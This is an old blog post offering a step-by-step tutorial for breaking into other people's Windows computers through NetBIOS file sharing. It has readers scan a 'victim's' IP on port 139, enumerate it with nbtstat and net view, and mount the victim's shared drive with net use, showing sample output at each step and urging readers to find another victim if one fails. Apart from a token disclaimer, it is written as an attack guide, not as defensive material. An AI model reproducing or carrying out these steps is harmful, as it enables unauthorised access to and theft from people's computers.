Monday, 26 September 2011

Posted by Unknown On 04:10

Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.
Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.
Step 1
Get a IP (range) scanner. (superscanner is a fast one, get it here).
Scan the victim’s ip on TCP/IP port 139 (More info about TCP/IP port here)



Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:\windows>

This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS  Remote Machine Name  TableName    Type    Status
—————————————————————
user<00>                                  UNIQUE                                 Registered
workgroup <00>                       GROUP                                  Registered
user <03>                                 UNIQUE                                 Registered
user  <20>                                UNIQUE                                  Registered

MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————

If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3
type down:
c:\windows>net view \\255.255.255.255
if the output is like this:
Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment
————————————————————
CDISK Disk xxxxx xxxxx

The command completed successfully.
“DISK” shows that the victim is sharing a Disk named as CDISK


Step 4

type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.

c:\windows>net use x: \\255.255.255.255\CDISK
If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:\> .

Hope you have enjoyed this small  hacking tutorial.

0 comments:

Post a Comment